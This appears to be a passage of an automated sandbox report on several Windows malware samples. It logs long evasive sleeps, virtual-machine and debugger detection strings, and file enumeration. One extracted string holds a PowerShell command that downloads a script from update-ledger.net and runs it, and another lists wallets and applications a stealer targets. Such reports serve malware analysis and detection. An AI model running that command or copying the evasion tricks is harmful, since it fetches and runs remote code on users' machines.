                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -586470s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -586314s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -586105s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -585905s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -585639s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -585310s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -584895s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -584640s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -584477s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -584286s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -584155s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 6084Thread sleep time: -16340000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 6304Thread sleep time: -60000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe TID: 1248Thread sleep count: 58 > 30
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe TID: 1248Thread sleep time: -116000s >= -30000s
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 5876Thread sleep time: -37000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe TID: 3180Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3636Thread sleep count: 170 > 30
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe TID: 4456Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2448Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeCode function: 0_2_004062EB FindFirstFileW,FindClose,0_2_004062EB
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeCode function: 0_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CB1
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00614005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00614005
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0061C2FF
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061494A GetFileAttributesW,FindFirstFileW,FindClose,19_2_0061494A
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061CD14 FindFirstFileW,FindClose,19_2_0061CD14
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_0061CD9F
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0061F5D8
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0061F735
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0061FA36
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00613CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00613CE2
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CC38B4 FindFirstFileExW,24_2_00CC38B4
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_007638B4 FindFirstFileExW,27_2_007638B4
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_004415EE FindFirstFileExW,31_2_004415EE
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B31855 FindFirstFileExW,31_2_02B31855
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005C5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,19_2_005C5D13
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeThread delayed: delay time: 60000
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 90918
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 922337203685477
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 600000
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 599876
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 599748
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 599593
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 599475
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 599359
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 88365
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 599192
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 598829
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 598466
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 598275
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 598122
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597959
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597755
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597609
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597491
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597372
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597219
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597090
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596969
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596831
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596712
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596566
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596440
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596323
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596204
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596070
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 595880
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 595695
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 595055
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594851
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594684
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594568
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594447
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594326
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594205
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594044
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593923
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593802
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593666
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 87631
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593555
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593395
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593270
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593136
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593024
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 592894
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 592725
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 592572
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 592428
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 591935
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 591600
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 591422
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 591314
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 591188
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 591072
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590942
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590798
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590645
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590517
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590400
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590274
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590129
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 589991
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 589830
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 589589
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 589386
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 589203
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 589102
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 588969
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 588832
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 588576
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 588213
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 96076
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 587769
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 587619
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 587501
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 587354
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 587144
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 586881
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 586638
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 586470
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 586314
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 586105
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 585905
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 585639
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 585310
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 584895
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 584640
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 584477
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 584286
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 584155
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeThread delayed: delay time: 60000
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 37000
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\591950\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\591950Jump to behavior
                        Source: Cerker.exe, 00000028.00000002.3447790560.00000000006EC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Avmtoolsd.dll
                        Source: 3546345.exe.11.drBinary or memory string: MPGamesUnknown %dTwitch StudioFacebookToolbarMessengersrcOEMLenovoServiceBridgeThinkBuzanFree_PDF_SolutionsVMwarePunkBusterNoxSony CorporationRAV Endpoint Protection
                        Source: kitty.exe, 00000018.00000002.3280704140.0000000000FD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: IIZS2TRqf69aZbLAX3cf3edn.exe.28.drBinary or memory string: vmware
                        Source: 3546345.exe, 00000025.00000002.4763090277.000000000112E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                        Source: Cerker.exe, 0000001B.00000002.3273140765.000000000050E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd.dllal\
                        Source: meta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.drBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
                        Source: RegAsm.exe, 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, D0nMCdvUeB.exe.51.drBinary or memory string: HgFSVDCVdb86m2CfHM1
                        Source: Cerker.exe, 0000001C.00000003.4062158892.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.4062158892.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000CE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Cerker.exe, 0000001B.00000002.3273140765.000000000050E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd.dll.0\
                        Source: RegAsm.exe, 0000002E.00000002.4809129127.00000000056AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
                        Source: channel2[1].exe.11.drBinary or memory string: (32-bit)DBGIsolatedStorageIdentityNexusIntegrationUnknown %dMovavi Video ConverterMovavi Video Editor/c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$Resp = Invoke-WebRequest -Uri 'https://update-ledger.net/update' -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'; $Scr = [System.Text.Encoding]::UTF8.GetString($Resp.Content); IEX $Scr"Free_PDF_SolutionsLenovoServiceBridgeVMwareu^
                        Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.4062158892.0000000001205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWV!t
                        Source: Channel1[1].exe.11.drBinary or memory string: ey&[ySUPERAntiSpywareCrashReportClientContacts.VirtualBoxLenovoServiceBridgeEdrawFree_PDF_SolutionsVMwarewalletsLGHUBLogitechAnkamaw+bMegaDownloaderThinkBuzanCode CacheABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ODISWindowsCommsOpera Software\Opera GX StableatomNichromeCyberLinkMetroVALORANT>
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe@\jq
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe`,jq
                        Source: winmsbt.exe, 00000021.00000002.4601446833.000000000102C000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4739504594.000000001BCC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeProcess queried: DebugPort
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_006245D5 BlockInput,19_2_006245D5
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_005C5240
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005E5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,19_2_005E5CAC
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeCode function: 0_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406312
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CBF0DD mov eax, dword ptr fs:[00000030h]24_2_00CBF0DD
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CBF099 mov eax, dword ptr fs:[00000030h]24_2_00CBF099
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CB5760 mov eax, dword ptr fs:[00000030h]24_2_00CB5760
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0075F0DD mov eax, dword ptr fs:[00000030h]27_2_0075F0DD
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_00755760 mov eax, dword ptr fs:[00000030h]27_2_00755760
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0075F099 mov eax, dword ptr fs:[00000030h]27_2_0075F099
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_0043DCE2 mov eax, dword ptr fs:[00000030h]31_2_0043DCE2
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_00439F7B mov eax, dword ptr fs:[00000030h]31_2_00439F7B
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02A0FACB push dword ptr fs:[00000030h]31_2_02A0FACB
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B2A1E2 mov eax, dword ptr fs:[00000030h]31_2_02B2A1E2
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02AF092B mov eax, dword ptr fs:[00000030h]31_2_02AF092B
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B2DF49 mov eax, dword ptr fs:[00000030h]31_2_02B2DF49
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02AF0D90 mov eax, dword ptr fs:[00000030h]31_2_02AF0D90
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_006088CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_006088CD
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess token adjusted: Debug
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeProcess token adjusted: Debug
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005DA354 SetUnhandledExceptionFilter,19_2_005DA354
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_005DA385
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CB0811 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00CB0811
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CB3DF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00CB3DF3
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CB0594 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00CB0594
